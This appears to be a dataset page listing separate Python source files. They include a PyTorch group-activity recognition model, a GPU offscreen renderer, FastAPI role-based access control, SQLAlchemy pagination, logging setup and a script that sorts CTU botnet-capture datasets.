np.dtype(np.uint8): c.dtype(builtin='uint8'),
np.dtype(np.int16): c.dtype(builtin='int16'),
np.dtype(np.uint16): c.dtype(builtin='uint16'),
np.dtype(np.int32): c.dtype(builtin='int32'),
np.dtype(np.uint32): c.dtype(builtin='uint32'),
np.dtype(np.int64): c.dtype(builtin='int64'),
np.dtype(np.uint64): c.dtype(builtin='uint64'),
np.dtype(np.float32): c.dtype(builtin='float'),
np.dtype(np.float64): c.dtype(builtin='double'),
}
|
487204
|
import torch.nn as nn
import torch
import torch.nn.functional as F
import numpy as np
import cv2
from utils import calc_pairwise_distance_3d
# from hrnet.init_hrnet import cls_hrnet_w32, pose_hrnet_w32
from config import Config
################# Bilinear Pooling Reasoning Module ###################
class STBilinearMessagingPassing(nn.Module):
def __init__(self, emb_fea_num, message_fea_num, T=3):
super(STBilinearMessagingPassing, self).__init__()
print('The emb_fea_num of Bilinear is ' + str(emb_fea_num))
print('The message_fea_num of Bilinear is ' + str(message_fea_num))
self.T = T
'''
self.U = nn.Linear(emb_fea_num, message_fea_num, bias=True)
self.V = nn.Linear(emb_fea_num, message_fea_num, bias=True)
self.w_a = nn.Parameter(torch.FloatTensor(1, message_fea_num), requires_grad=True)
'''
self.U = nn.Linear(emb_fea_num, emb_fea_num, bias=True)
self.V = nn.Linear(emb_fea_num, emb_fea_num, bias=True)
self.w_a = nn.Parameter(torch.FloatTensor(1, emb_fea_num), requires_grad=True)
# jianshu.com/p/d8b77cc02410
nn.init.kaiming_normal_(self.w_a)
self.W_e2 = nn.Linear(emb_fea_num, message_fea_num, bias=False)
self.W_e1 = nn.Linear(message_fea_num, emb_fea_num, bias=False)
self.layernorm = nn.LayerNorm(message_fea_num)
self.non_linear = nn.ReLU(inplace=True)
#nn.init.kaiming_normal_(self.W_e1.weight)
#nn.init.kaiming_normal_(self.W_e2.weight)
self.R_mat = None
def forward(self, feature, mask):
'''
:param feature: shape:[B*T, N, NFB]
:param mask: [B*T, N, N]
:return: [B*T, N, NFB]
'''
T = self.T
B = feature.shape[0]//T
#BT = feature.shape[0]
N = feature.shape[1]
feature = feature.reshape(B, T*N, -1)
# feature = feature.reshape(BT*N, -1)
feature_U = self.U(feature) # [B, T*N, NFM]
# feature_U = feature_U.reshape(BT, N, -1)
feature_V = self.V(feature) # [B, T*N, NFM]
# feature_V = feature_V.reshape(BT, N, -1)
feature_U = feature_U * self.w_a # [B, T*N, NFM]
UV = torch.matmul(feature_U, feature_V.transpose(1, 2)) # [B, T*N, T*N]
UV[mask] = -float('inf')
# print("UV shape:"+str(UV.shape))
matrix_e = F.softmax(UV, dim=2) # [B, T*N, T*N] softmax by row!!!!!
self.R_mat = matrix_e
feature_W_e2 = self.W_e2(feature)
feature_e = torch.matmul(matrix_e, feature_W_e2) # [B, T*N, NFM]
feature_e_nl = self.layernorm(feature_e) # [B, T*N, NFM]
feature_e_nl_nonl = self.non_linear(feature_e_nl) # [B, T*N, NFM]
feature_out = self.W_e1(feature_e_nl_nonl)
feature_out = feature_out.reshape(B*T, N, -1)
return feature_out
class multiheadSTBilinearMessagingPassing(nn.Module):
def __init__(self, emb_fea_num, message_fea_num, num_heads, T=3):
super(multiheadSTBilinearMessagingPassing, self).__init__()
self.bilinear_list = nn.ModuleList([STBilinearMessagingPassing(emb_fea_num, message_fea_num, T=T) for i in range(num_heads)])
self.num_heads = num_heads
self.vis_R_mat = torch.empty((0, 36, 36), dtype=torch.float32)
def forward(self, feature, mask, fusion_method, shortcut_connection = False):
if fusion_method == 'sum':
feature_out = self.bilinear_list[0](feature, mask)
#self.vis_R_mat = torch.cat((self.bilinear_list[0].R_mat.cpu(), self.vis_R_mat), dim = 0)
for i in range(self.num_heads - 1):
feature_out+=self.bilinear_list[i+1](feature, mask)
#self.vis_R_mat = torch.cat((self.bilinear_list[i+1].R_mat.cpu(), self.vis_R_mat),
# dim = 0)
elif fusion_method == 'cat':
feature_out = []
for i in range(self.num_heads):
feature_out.append(self.bilinear_list[i](feature, mask))
feature_out = torch.cat(feature_out, dim = 2)
#print(self.vis_R_mat.shape[0])
#if self.vis_R_mat.shape[0] == 20*3*8:
# save_R_mat = self.vis_R_mat.numpy().reshape(20*3*8, 36*36)
# np.savetxt('vis/R_mat/R_mat.txt', save_R_mat)
if fusion_method == 'sum':
if shortcut_connection == True:
return feature + feature_out
elif shortcut_connection == False:
return feature_out
elif fusion_method == 'cat':
return torch.cat((feature_out, feature), dim=2)
def generate_spatial_mask(boxes_positions, threshold, BT, N, OH):
"""
:param loc: B*T*N, 4 #Center point of every box
:param threshold: float, e.g. 0.3, 0.2
:return:
"""
boxes_positions_cl = boxes_positions.clone()
boxes_positions_cl[:, 0] = (boxes_positions_cl[:, 0] + boxes_positions_cl[:, 2]) / 2
boxes_positions_cl[:, 1] = (boxes_positions_cl[:, 1] + boxes_positions_cl[:, 3]) / 2
boxes_positions_cl = boxes_positions_cl[:, :2].reshape(BT, N, 2) # B*T, N, 2
boxes_distances = calc_pairwise_distance_3d(boxes_positions_cl, boxes_positions_cl) # B*T, N, N
position_mask = (boxes_distances > (threshold * OH))
return position_mask
################# Context Encoding Module ###################
################# Context Encoding Module ###################
################# Context Encoding Module ###################
class ContextEncodingTransformer(nn.Module):
def __init__(self, num_features_context, D, K, N, layer_id, num_heads_per_layer, context_dropout_ratio = 0.1):
super(ContextEncodingTransformer, self).__init__()
self.num_features_context = num_features_context
if layer_id == 1:
self.downsample1 = nn.Conv2d(D, num_features_context, kernel_size = 1, stride = 1)
self.downsample2 = nn.Conv2d(768, num_features_context, kernel_size = 1, stride=1)
'''nn.init.kaiming_normal_(self.downsample1.weight)
nn.init.kaiming_normal_(self.downsample2.weight)
self.downsample = nn.Conv2d(D, num_features_context, kernel_size=1, stride=1)'''
#nn.init.kaiming_normal_(self.downsample.weight)
self.emb_roi = nn.Linear(num_features_context * K * K, num_features_context, bias=True)
elif layer_id > 1:
self.downsample = nn.Conv2d(768, num_features_context, kernel_size=1, stride=1)
self.emb_roi = nn.Linear(num_features_context * num_heads_per_layer, num_features_context, bias=True)
nn.init.kaiming_normal_(self.downsample.weight)
self.N = N
self.K = K
self.dropout = nn.Dropout(context_dropout_ratio)
self.layernorm1 = nn.LayerNorm(num_features_context)
self.FFN = nn.Sequential(
nn.Linear(num_features_context,num_features_context, bias = True),
nn.ReLU(inplace = True),
nn.Dropout(context_dropout_ratio),
nn.Linear(num_features_context,num_features_context, bias = True)
)
self.layernorm2 = nn.LayerNorm(num_features_context)
def forward(self, roi_feature, image_feature, layer_id = -1):
"""
:param roi_feature: # B*T*N, D, K, K,
:param image_feature: # B*T, D, OH, OW
:return:
"""
NFC = self.num_features_context
BT, _,OH,OW = image_feature.shape
K = self.K #roi_feature.shape[3]
N = self.N #roi_feature.shape[0]//BT
assert N==12
assert layer_id>=1
if layer_id == 1:
roi_feature = self.downsample1(roi_feature)
image_feature = self.downsample2(image_feature)
roi_feature = roi_feature.reshape(-1, NFC*K*K)
emb_roi_feature = self.emb_roi(roi_feature) # B*T*N, D
elif layer_id > 1:
emb_roi_feature = self.emb_roi(roi_feature)
image_feature = self.downsample(image_feature)
emb_roi_feature = emb_roi_feature.reshape(BT, N, 1, 1, NFC) # B*T, N, 1, 1, D
image_feature = image_feature.reshape(BT, 1, NFC, OH, OW) # B*T, 1, D, OH, OW
image_feature = image_feature.transpose(2,3) # B*T, 1, OH, D, OW
a = torch.matmul(emb_roi_feature, image_feature) # B*T, N, OH, 1, OW
a = a.reshape(BT, N, -1) # B*T, N, OH*OW
A = F.softmax(a, dim=2) # B*T, N, OH*OW
image_feature = image_feature.transpose(3,4).reshape(BT, OH*OW, NFC)
context_encoding_roi = self.dropout(torch.matmul(A, image_feature).reshape(BT*N, NFC))
emb_roi_feature = emb_roi_feature.reshape(BT*N, NFC)
context_encoding_roi = self.layernorm1(context_encoding_roi + emb_roi_feature)
context_encoding_roi = context_encoding_roi + self.FFN(context_encoding_roi)
context_encoding_roi = self.layernorm2(context_encoding_roi)
return context_encoding_roi
class MultiHeadLayerContextEncoding(nn.Module):
def __init__(self, num_heads_per_layer, num_layers, num_features_context, D, K, N, context_dropout_ratio=0.1):
super(MultiHeadLayerContextEncoding, self).__init__()
self.CET = nn.ModuleList()
for i in range(num_layers):
for j in range(num_heads_per_layer):
self.CET.append(ContextEncodingTransformer(num_features_context, D, K, N, i+1, num_heads_per_layer, context_dropout_ratio))
self.num_layers = num_layers
self.num_heads_per_layer = num_heads_per_layer
def forward(self, roi_feature, image_feature):
"""
:param roi_feature: # B*T*N, D, K, K,
:param image_feature: # B*T, D, OH, OW
:return:
"""
for i in range(self.num_layers):
MHL_context_encoding_roi= []
for j in range(self.num_heads_per_layer):
MHL_context_encoding_roi.append(self.CET[i*self.num_heads_per_layer + j](roi_feature, image_feature, i+1))
roi_feature = torch.cat(MHL_context_encoding_roi, dim=1)
return roi_feature
class EmbfeatureContextEncodingTransformer(nn.Module):
def __init__(self, num_features_context, NFB, K, N, layer_id, num_heads_per_layer, context_dropout_ratio = 0.1):
super(EmbfeatureContextEncodingTransformer, self).__init__()
self.num_features_context = num_features_context
if layer_id == 1:
self.downsample2 = nn.Conv2d(512, num_features_context, kernel_size = 1, stride=1)
'''nn.init.kaiming_normal_(self.downsample1.weight)
nn.init.kaiming_normal_(self.downsample2.weight)
self.downsample = nn.Conv2d(D, num_features_context, kernel_size=1, stride=1)'''
self.emb_roi = nn.Linear(NFB, num_features_context, bias=True)
elif layer_id > 1:
self.downsample = nn.Conv2d(512, num_features_context, kernel_size=1, stride=1)
self.emb_roi = nn.Linear(num_features_context * num_heads_per_layer, num_features_context, bias=True)
nn.init.kaiming_normal_(self.downsample.weight)
self.N = N
self.K = K
self.dropout = nn.Dropout(context_dropout_ratio)
self.layernorm1 = nn.LayerNorm(num_features_context)
self.FFN = nn.Sequential(
nn.Linear(num_features_context,num_features_context, bias = True),
nn.ReLU(inplace = True),
nn.Dropout(context_dropout_ratio),
nn.Linear(num_features_context,num_features_context, bias = True)
)
self.layernorm2 = nn.LayerNorm(num_features_context)
self.att_map = None
def forward(self, roi_feature, image_feature, layer_id = -1):
"""
:param roi_feature: # B*T*N, NFB
:param image_feature: # B*T, D, OH, OW
:return:
"""
NFC = self.num_features_context
BT, _,OH,OW = image_feature.shape
K = self.K #roi_feature.shape[3]
N = self.N #roi_feature.shape[0]//BT
assert N==12
assert layer_id>=1
if layer_id == 1:
image_feature = self.downsample2(image_feature)
emb_roi_feature = self.emb_roi(roi_feature) # B*T*N, D
elif layer_id > 1:
emb_roi_feature = self.emb_roi(roi_feature)
image_feature = self.downsample(image_feature)
emb_roi_feature = emb_roi_feature.reshape(BT, N, 1, 1, NFC) # B*T, N, 1, 1, D
image_feature = image_feature.reshape(BT, 1, NFC, OH, OW) # B*T, 1, D, OH, OW
image_feature = image_feature.transpose(2,3) # B*T, 1, OH, D, OW
a = torch.matmul(emb_roi_feature, image_feature) # B*T, N, OH, 1, OW
a = a.reshape(BT, N, -1) # B*T, N, OH*OW
A = F.softmax(a, dim=2) # B*T, N, OH*OW
self.att_map = A
image_feature = image_feature.transpose(3,4).reshape(BT, OH*OW, NFC)
context_encoding_roi = self.dropout(torch.matmul(A, image_feature).reshape(BT*N, NFC))
emb_roi_feature = emb_roi_feature.reshape(BT*N, NFC)
context_encoding_roi = self.layernorm1(context_encoding_roi + emb_roi_feature)
context_encoding_roi = context_encoding_roi + self.FFN(context_encoding_roi)
context_encoding_roi = self.layernorm2(context_encoding_roi)
return context_encoding_roi
class MultiHeadLayerEmbfeatureContextEncoding(nn.Module):
def __init__(self, num_heads_per_layer, num_layers, num_features_context, NFB, K, N, context_dropout_ratio=0.1):
super(MultiHeadLayerEmbfeatureContextEncoding, self).__init__()
self.CET = nn.ModuleList()
for i in range(num_layers):
for j in range(num_heads_per_layer):
self.CET.append(EmbfeatureContextEncodingTransformer(num_features_context, NFB, K, N, i+1, num_heads_per_layer, context_dropout_ratio))
self.num_layers = num_layers
self.num_heads_per_layer = num_heads_per_layer
self.vis_att_map = torch.empty((0, 12, 43 * 78), dtype = torch.float32)
def forward(self, roi_feature, image_feature):
"""
:param roi_feature: # B*T*N, NFB,
:param image_feature: # B*T, D, OH, OW
:return:
"""
for i in range(self.num_layers):
MHL_context_encoding_roi= []
for j in range(self.num_heads_per_layer):
MHL_context_encoding_roi.append(self.CET[i*self.num_heads_per_layer + j](roi_feature, image_feature, i+1))
roi_feature = torch.cat(MHL_context_encoding_roi, dim=1)
return roi_feature
################# Pose Encoding Module ###################
################# Pose Encoding Module ###################
################# Pose Encoding Module ###################
img_name = ['1.jpg', '2.jpg', '3.jpg', '4.jpg', '5.jpg', '6.jpg',
'7.jpg', '8.jpg', '9.jpg', '10.jpg', '11.jpg', '12.jpg']
class Pose2d_Encoder(nn.Module):
def __init__(self, cfg, pose_net = 'pose_hrnet_w32'):
super(Pose2d_Encoder, self).__init__()
if pose_net == 'pose_hrnet_w32':
self.encoder = pose_hrnet_w32(pretrained=True)
self.cfg = cfg
def forward(self, image, boxes):
"""
:param image: # B*T, 3, H, W # after mean and std tranform
:param boxes: # B*T*N, 4 # w1, h1, w2, h2 #OH, OW
:return:
"""
BT = image.shape[0]
N = int(boxes.shape[0] / BT)
OH, OW = self.cfg.out_size
H, W = self.cfg.image_size
#assert N == 12
ori_boxes = boxes.clone()
ori_boxes = ori_boxes.cpu().numpy()
ori_boxes[:,0] = np.clip(ori_boxes[:,0] / float(OW) * float(W), 0, W)
ori_boxes[:,2] = np.clip(ori_boxes[:,2] / float(OW) * float(W), 0, W)
ori_boxes[:,1] = np.clip(ori_boxes[:,1] / float(OH) * float(H), 0, H)
ori_boxes[:,3] = np.clip(ori_boxes[:,3] / float(OH) * float(H), 0, H)
ori_boxes = ori_boxes.reshape(BT, N, 4) #BT, N, 4
roi_image = []
for i in range(BT):
for j in range(N):
ij_box = (int(ori_boxes[i][j][1]), int(ori_boxes[i][j][3]), int(ori_boxes[i][j][0]), int(ori_boxes[i][j][2]))
roi_image.append(image[i, :, ij_box[0]:ij_box[1], ij_box[2]:ij_box[3]])
roi_image[-1] = roi_image[-1].cpu().numpy()
roi_image[-1] = roi_image[-1].transpose(1,2,0) # 3,H,W ->H,W,3
roi_image[-1] = cv2.resize(roi_image[-1], (192, 256))
#cv2.imwrite(img_name[j], roi_image[-1]*255.)
roi_image[-1] = torch.Tensor(roi_image[-1].transpose(2,0,1)) # H,W,3 ->3,H,W
roi_image = torch.stack(roi_image, dim = 0) # B*T*N, 3, H, W
roi_image = roi_image.cuda()
#print(roi_image.shape) #torch.Size([72, 3, 256, 192])
roi_pose_feature = self.encoder(roi_image)
return roi_pose_feature
if __name__=='__main__':
'''test SpatialMessagePassing
s = SpatialMessagePassing(4, 4)
t = torch.rand(1,4,4)
mask = torch.ones((1,4,4))
print(s(t, mask))
print(t)'''
'''test Pose2d_Encoder
cfg = Config('volleyball')
p2d = Pose2d_Encoder(cfg)'''
'''test Context Encoding Transformer
cet = ContextEncodingTransformer(num_features_context=128,D=256, K=5, N=12, layer_id=1,
num_heads_per_layer=1, context_dropout_ratio = 0.1)
roi_feature = torch.rand(36,256,5,5)
image_feature = torch.rand(3, 256, 45, 80)
context_encoding_roi = cet(roi_feature, image_feature, 1)
print(context_encoding_roi.shape)'''
'''test multi-layer multi-head context encoding transformer'''
mlhcet = MultiHeadLayerContextEncoding(3, 1, num_features_context=128, D=256, K=5, N=12, context_dropout_ratio=0.1)
roi_feature = torch.rand(36, 256, 5, 5)
image_feature = torch.rand(3, 256, 45, 80)
context_encoding_roi = mlhcet(roi_feature, image_feature)
print(context_encoding_roi.shape)
'''test temporal message passing
tmp = multiheadTemporalMessage(128, 128, 3)
t1 = torch.rand(6,12,128)
mask = generate_temporal_mask(2, 12, 3)
print(mask.shape)
output = tmp(t1, mask, shortcut_connection=True)
print(output)
print(output.shape)'''
|
487205
|
import pytest
@pytest.fixture
def matched_set(testapp, lab, award):
item = {
'lab': lab['@id'],
'award': award['@id']
}
return item
@pytest.fixture
def base_matched_set(testapp, lab, award):
item = {
'award': award['uuid'],
'lab': lab['uuid']
}
return testapp.post_json('/matched_set', item, status=201).json['@graph'][0]
|
487211
|
import cocotb
@cocotb.test()
async def test(dut):
# Toggling an input should trigger the simulator to print a message
# similar to:
#
# b.vhdl:9:5:@0ms:(report note): :a(structural):b@b(structural):
#
dut.x.value = False
|
487246
|
from glumpy import app, gloo, gl
from contextlib import contextmanager
import numpy as np
try:
import pycuda.driver
from pycuda.gl import graphics_map_flags, BufferObject
_PYCUDA = True
except ImportError as err:
print('pycuda import error:', err)
_PYCUDA = False
import torch
class OffscreenRender:
def __init__(self, viewport_size, out_buffer_location='opengl', clear_color=None):
self._init_buffers(viewport_size, out_buffer_location)
self.clear_color = clear_color if clear_color is not None else (0., 0., 0., 1.)
def _init_buffers(self, viewport_size, out_buffer_location):
assert out_buffer_location in ['torch', 'opengl', 'numpy']
if out_buffer_location == 'torch':
assert _PYCUDA, 'pycuda is not available'
try:
import pycuda.gl.autoinit # this may fails in headless mode
except:
raise RuntimeError('PyCUDA init failed, cannot use torch buffer')
_ = torch.cuda.FloatTensor(1, 3, 512,512) # needs init here, otherwise does not work
color_np = np.zeros((viewport_size[1], viewport_size[0], 4), np.float32)
self.color_buf, self.color_buf_cuda = create_shared_texture(color_np)
self.out_buf = torch.zeros((viewport_size[1], viewport_size[0], 4), dtype=torch.float32).cuda()
elif out_buffer_location == 'opengl':
self.color_buf = np.zeros((viewport_size[1], viewport_size[0], 4), dtype=np.float32).view(gloo.TextureFloat2D)
self.out_buf = self.color_buf
elif out_buffer_location == 'numpy':
self.color_buf = np.zeros((viewport_size[1], viewport_size[0], 4), dtype=np.float32).view(gloo.TextureFloat2D)
self.out_buf = np.zeros((viewport_size[1], viewport_size[0], 3), dtype=np.float32)
self.viewport_size = viewport_size
self.out_buffer_location = out_buffer_location
self.depth_buf = gloo.DepthBuffer(viewport_size[0], viewport_size[1], gl.GL_DEPTH_COMPONENT32)
self.fbo = gloo.FrameBuffer(color=self.color_buf, depth=self.depth_buf)
def render(self, scene, cull_face=True):
self.fbo.activate()
gl.glEnable(gl.GL_PROGRAM_POINT_SIZE)
gl.glEnable(gl.GL_DEPTH_TEST)
gl.glShadeModel(gl.GL_FLAT)
if cull_face:
gl.glEnable(gl.GL_CULL_FACE)
gl.glCullFace(gl.GL_BACK)
else:
gl.glDisable(gl.GL_CULL_FACE)
gl.glClearColor(*self.clear_color)
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glViewport(0, 0, self.viewport_size[0], self.viewport_size[1])
if scene.draw_points:
scene.program.draw(gl.GL_POINTS)
else:
assert scene.index_buffer is not None
scene.program.draw(gl.GL_TRIANGLES, scene.index_buffer)
if self.out_buffer_location == 'torch':
frame = cpy_texture_to_tensor(self.color_buf_cuda, self.out_buf).clone()
elif self.out_buffer_location == 'opengl':
frame = self.out_buf
else:
gl.glReadPixels(0, 0, self.viewport_size[0], self.viewport_size[1], gl.GL_RGB, gl.GL_FLOAT, self.out_buf)
frame = self.out_buf.copy()
self.fbo.deactivate()
return frame
@contextmanager
def cuda_activate_array(img):
"""Context manager simplifying use of pycuda.gl.RegisteredImage"""
mapping = img.map()
yield mapping.array(0,0)
mapping.unmap()
@contextmanager
def cuda_activate_buffer(buf):
mapping = buf.map()
yield mapping.device_ptr()
mapping.unmap()
def create_shared_texture(arr, map_flags=None):
"""Create and return a Texture2D with gloo and pycuda views."""
if map_flags is None:
map_flags = graphics_map_flags.WRITE_DISCARD
gl_view = arr.view(gloo.TextureFloat2D)
gl_view.activate() # force gloo to create on GPU
gl_view.deactivate()
cuda_view = pycuda.gl.RegisteredImage(
int(gl_view.handle), gl_view.target, map_flags)
return gl_view, cuda_view
def create_shared_buffer(arr):
"""Create and return a BufferObject with gloo and pycuda views."""
gl_view = arr.view(gloo.VertexBuffer)
gl_view.activate() # force gloo to create on GPU
gl_view.deactivate()
cuda_view = BufferObject(np.long(gl_view.handle))
return gl_view, cuda_view
def cpy_texture_to_tensor(texture, tensor):
"""Copy GL texture (cuda view) to pytorch tensor"""
with cuda_activate_array(texture) as src:
cpy = pycuda.driver.Memcpy2D()
cpy.set_src_array(src)
cpy.set_dst_device(tensor.data_ptr())
cpy.width_in_bytes = cpy.src_pitch = cpy.dst_pitch = tensor.shape[1] * 4 * 4
cpy.height = tensor.shape[0]
cpy(aligned=False)
torch.cuda.synchronize()
return tensor
def cpy_tensor_to_texture(tensor, texture):
"""Copy pytorch tensor to GL texture (cuda view)"""
with cuda_activate_array(texture) as ary:
cpy = pycuda.driver.Memcpy2D()
cpy.set_src_device(tensor.data_ptr())
cpy.set_dst_array(ary)
cpy.width_in_bytes = cpy.src_pitch = cpy.dst_pitch = tensor.shape[1] * 4 * 4
cpy.height = tensor.shape[0]
cpy(aligned=False)
torch.cuda.synchronize()
return tensor
def cpy_buffer_to_tensor(buffer, tensor):
"""Copy GL buffer (cuda view) to pytorch tensor"""
n = tensor.numel()*tensor.element_size()
with cuda_activate_buffer(buffer) as buf_ptr:
pycuda.driver.memcpy_dtod(tensor.data_ptr(), buf_ptr, n)
def cpy_tensor_to_buffer(tensor, buffer):
"""Copy pytorch tensor to GL buffer (cuda view)"""
n = tensor.numel()*tensor.element_size()
with cuda_activate_buffer(buffer) as buf_ptr:
pycuda.driver.memcpy_dtod(buf_ptr, tensor.data_ptr(), n)
|
487277
|
from pybricks.parameters import Direction, Port
class DCMotor:
"""
Generic class to control simple motors without rotation sensors, such as train motors.
Args:
port (Port): Port to which the motor is connected.
positive_direction (Direction): Which direction the motor should turn when you give a positive duty cycle value.
"""
def __init__(self, port: Port, positive_direction: Direction = Direction.CLOCKWISE):
if port == Port.S1 or port == Port.S2 or port == Port.S3 or port == Port.S4:
raise ValueError("Motors must use Port A, B, C, or D.")
def dc(self, duty: int):
"""
Rotates the motor at a given duty cycle (also known as “power”).
Args:
duty (int): The duty cycle as a percentage (-100 to 100).
"""
...
def stop(self):
"""
Stops the motor and lets it spin freely.
The motor gradually stops due to friction.
"""
...
|
487284
|
from enum import Enum
REQUIRED_KEYS_FOR_LAMBDA_EVENT = ["path", "httpMethod"]
class OrganizationType(Enum):
ORGANIZATION = "organization"
INDIVIDUAL = "individual"
class VerificationType(Enum):
DUNS = "DUNS"
JUMIO = "JUMIO"
INDIVIDUAL = "INDIVIDUAL"
|
487291
|
import os
import shutil
import json
import config as c
with open('./infected_ips.json', 'r') as f:
infected_ips = json.load(f)
with open('./normal_ips.json', 'r') as f:
normal_ips = json.load(f)
index = 0
for sub_set in os.listdir(c.datasets_folder_general):
if sub_set.startswith(".") or not os.path.exists(datasets_folder + sub_set + '/bro/ssl.log'):
continue
dataset_folder = c.datasets_folder_general + sub_set
index += 1
dataset_number = int(sub_set.split('-')[4])
if sub_set.startswith("CTU-Malware-Capture-Botnet-") and (dataset_number <= 42 or dataset_number >= 54):
print("========================================================")
print("======== #" + str(index) + " " + sub_set)
print("========================================================")
if len(infected_ips[sub_set][0]) == 0 and \
len(normal_ips[sub_set][0]) == 0:
print("Moving dataset {} ({}) to {}".format(sub_set, dataset_folder, folder_other_datasets))
shutil.move(dataset_folder, c.datasets_discarded_folder)
|
487297
|
from fastapi import FastAPI
from fastapi_authorization.rbac import RBAC
from fastapi_authorization.testing import auto_test_protected_endpoints
auth = RBAC(lambda: "admin")
auth.add_role("admin", permissions=["user:create", "user:read"])
auth.add_role("superadmin", permissions=["admin:create", "admin:read"])
auth.add_role("user", permissions=["user:read"])
app = FastAPI()
@app.get("/", dependencies=[auth.Permission("user:read")])
def get_endpoint():
...
auto_test_protected_endpoints(app, auth)
|
487302
|
from math import ceil
from boiler.collections.pagination import paginate
from pprint import pprint as pp
class PaginatedCollection:
"""
Paginated collection
Accepts an SQLAlchemy query object on initialization along with some
pagination settings and then allows you to iterate over itself in a
paginated manner: iterate over items in current page then call next_page()
to fetch next slice of data.
"""
def __init__(self, query, *_, page=1, per_page=10, pagination_range=5):
"""
Initialise collection
Creates an instance of collection. Requires an query object to
iterate through. Will issue 2 queries: one to count total items and
second to fetch actual items. Optionally generates a page range
to print range-like paginations of a given slice size.
:param query:
:param _: args, ignored
:param page: int, page to fetch
:param per_page: int, items per page
:param pagination_range: int, number of pages in pagination
"""
self._query = query
self.page = page
self.per_page = per_page
self.total_items = self._query.count()
self.total_pages = ceil(self.total_items / per_page)
# paginate
self.pagination = paginate(
page=page,
total_pages=self.total_pages,
total_items=self.total_items,
slice_size=pagination_range
)['pagination']
# fetch items
self.items = self.fetch_items()
def __repr__(self):
""" Get printable representation of collection """
data = 'page="{}" per_page="{}" total_items="{}" total_pages="{}" '
data += 'items="[...]"' if len(list(self.items)) > 0 else 'items="[]"'
class_name = self.__class__.__name__
printable = '<{} {}>'.format(class_name, data)
return printable.format(
self.page,
self.per_page,
self.total_items,
self.total_pages
)
def __iter__(self):
""" Performs generator-based iteration through page items """
offset = 0
while offset < len(self.items):
item = self.items[offset]
offset += 1
yield item
def fetch_items(self):
"""
Fetch items
Performs a query to retrieve items based on current query and
pagination settings.
"""
offset = self.per_page * (self.page - 1)
items = self._query.limit(self.per_page).offset(offset).all()
return items
def dict(self):
""" Returns current collection as a dictionary """
collection = dict(
page=self.page,
per_page=self.per_page,
total_items=self.total_items,
total_pages=self.total_pages,
pagination=self.pagination,
items=list(self.items)
)
return collection
def is_first_page(self):
""" Check if we are on the first page """
return self.page == 1
def is_last_page(self):
""" Checks if we are on the last page """
return self.page == self.total_pages
def next_page(self):
"""
Next page
Uses query object to fetch next slice of items unless on last page in
which case does nothing
"""
if self.is_last_page():
return False
self.page += 1
self.items = self.fetch_items()
return True
def previous_page(self):
"""
Previous page
Uses query object to fetch previous slice of items unless on first
page in which case does nothing
"""
if self.is_first_page():
return False
self.page -= 1
self.items = self.fetch_items()
return True
|
487327
|
import logging
import coloredlogs
import traceback
from logging.handlers import RotatingFileHandler
import os
import pathlib
# init coloredlogs
__fmt = '[%(name)s][%(levelname)s] (%(filename)s:%(lineno)d):\n%(message)s\n'
# get and conf root logger
root_logger: logging.Logger = logging.getLogger('UMR')
coloredlogs.install(fmt=__fmt, level='DEBUG')
def __log_except_hook(*exc_info):
# Output unhandled exception
ex_hook_logger = root_logger.getChild('UnknownException')
text = "".join(traceback.format_exception(*exc_info))
ex_hook_logger.error("Unhandled exception: %s", text)
def get_logger(suffix):
return root_logger.getChild(suffix)
def post_init():
# Logger for this module
logger = root_logger.getChild('Logging')
logger.info('Initializing logging')
from .UMRConfig import config
# log level
if '*' in config.LogLevel:
root_logger.setLevel(f"{config.LogLevel['*']}")
for logger_name in config.LogLevel:
if logger_name == '*':
continue
logging.getLogger(logger_name).setLevel(f"{config.LogLevel[logger_name]}")
# log to file
log_path = config.LogRoot
if log_path.startswith('~'):
home = str(pathlib.Path.home())
log_path = f'{home}/{config.LogRoot[1:]}'
# set rotate handler
os.makedirs(log_path, exist_ok=True) # create logging folder
rotate_handler = RotatingFileHandler(
os.path.join(log_path, 'bot.log'), maxBytes=1048576, backupCount=1, encoding='utf-8')
standard_formatter = logging.Formatter(
'[%(asctime)s][%(name)s][%(levelname)s] (%(filename)s:%(lineno)d):\n%(message)s\n')
rotate_handler.setFormatter(standard_formatter)
# __root_logger.addHandler(__rotate_handler)
logging.getLogger().addHandler(rotate_handler)
logger.info('Initialized logging')
|
487349
|
import biothings.hub.dataload.uploader as uploader
class WikipediaUploader(uploader.DummySourceUploader):
name = "wikipedia"
@classmethod
def get_mapping(klass):
mapping = {
"wikipedia": {
"dynamic": False,
"properties": {
"url_stub": {
"type": "text",
'copy_to': ['all'],
}
}
}
}
return mapping
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.